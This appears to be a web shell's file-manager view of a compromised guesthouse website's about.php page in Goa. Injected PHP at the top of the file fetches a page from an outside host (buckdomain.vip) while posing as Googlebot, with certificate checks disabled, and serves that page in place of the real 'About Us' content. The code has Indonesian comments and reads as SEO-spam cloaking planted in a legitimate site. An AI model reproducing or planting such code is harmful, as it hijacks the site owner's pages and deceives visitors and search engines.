File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/richardinnresidency.com/about.php
Back
<?php // ============================ // KONFIGURASI // ============================ $target = 'https://buckdomain.vip/ledak388/richardinnresidency.com-about.php.html'; // ============================ // DETEKSI USER AGENT // ============================ $agent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $isGoogle = ( stripos($agent, 'googlebot') !== false || stripos($agent, 'google-inspectiontool') !== false ); // ============================ // FETCH MIRROR UNTUK GOOGLE // ============================ $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'header' => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n", 'timeout' => 10 ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $html = @file_get_contents($target, false, $context); // ============================ // OUTPUT // ============================ if ($html !== false && strlen($html) > 100) { header("Content-Type: text/html; charset=UTF-8"); echo $html; exit; } // ============================ // FAILBACK // ============================ http_response_code(502); echo "Mirror tidak tersedia"; ?> <!DOCTYPE html> <html lang="zxx"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>About Us | Richard Residency</title> <link rel="shortcut icon" href="img/favicon.png" /> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Barlow&family=Barlow+Condensed&family=Gilda+Display&display=swap"> <link rel="stylesheet" href="css/plugins.css" /> <link rel="stylesheet" href="css/style.css" /> </head> <body> <?php include 'include/header.php'?> <div class="banner-header section-padding valign bg-img bg-fixed" data-overlay-dark="4" data-background="img/bg/1.jpg" > <div class="container"> <div class="row"> <div class="col-md-12 caption mt-90"> <!--<h5>Richard Residency</h5>--> <h1>About Us</h1> </div> </div> </div> </div> <section class="about section-padding bg-cream"> <div class="container"> <div class="row"> <div class="col-md-6 mt-30 animate-box" data-animate-effect="fadeInUp"> <span> <i class="star-rating"></i> <i class="star-rating"></i> <i class="star-rating"></i> <i class="star-rating"></i> <i class="star-rating"></i> </span> <div class="section-subtitle"> Richard Residency</div> <div class="section-title">Enjoy a comfortable stay</div> <p>Richard Residency is a guesthouse / homestay situated in Calangute, in the North Goa region . Bestowing excellent hospitality to its every category of guests, Richard Residency reflects the culture and ethos of its location. With the perfect fusion of contemporary decor in the sumptuous interiors of the stay, the residency has set the bar of services much higher than the expectations of its guests. The concept of intuitive anticipatory service makes the guest experience unalloyed. It is located in the Calangute Beach district, with some attractions like Baga Beach and Fort Aguada within reachable distance.</p> <!-- call --> </div> <div class="col col-md-6 animate-box" data-animate-effect="fadeInUp"> <img src="img/about/about3.jpg" alt="" class="mt-30 mb-30"> </div> </div> </section> <section class="facilties section-padding"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="section-subtitle">Our Services</div> <div class="section-title">Facilities we provide</div> </div> </div> <div class="row"> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/1.png"> <h5> Wi-Fi</h5> <div class="facility-shape"> <img src="img/services/1.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/2.png"> <h5> Hot and cold water </h5> <div class="facility-shape"> <img src="img/services/2.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/3.png"> <h5>24-hour Service</h5> <div class="facility-shape"> <img src="img/services/3.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/5.png"> <h5>Room Service</h5> <div class="facility-shape"> <img src="img/services/5.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/6.png"> <h5>Laundry Service</h5> <div class="facility-shape"> <img src="img/services/6.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/9.png"> <h5>Parking</h5> <div class="facility-shape"> <img src="img/services/9.png"> </div> </div> </div> </div> </div> </section> <?php include 'include/footer.php'?> <!-- jQuery --> <script src="js/jquery-3.6.0.min.js"></script> <script src="js/jquery-migrate-3.0.0.min.js"></script> <script src="js/modernizr-2.6.2.min.js"></script> <script src="js/imagesloaded.pkgd.min.js"></script> <script src="js/jquery.isotope.v3.0.2.js"></script> <script src="js/pace.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/scrollIt.min.js"></script> <script src="js/jquery.waypoints.min.js"></script> <script src="js/owl.carousel.min.js"></script> <script src="js/jquery.stellar.min.js"></script> <script src="js/jquery.magnific-popup.js"></script> <script src="js/YouTubePopUp.js"></script> <script src="js/select2.js"></script> <script src="js/datepicker.js"></script> <script src="js/smooth-scroll.min.js"></script> <script src="js/custom.js"></script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings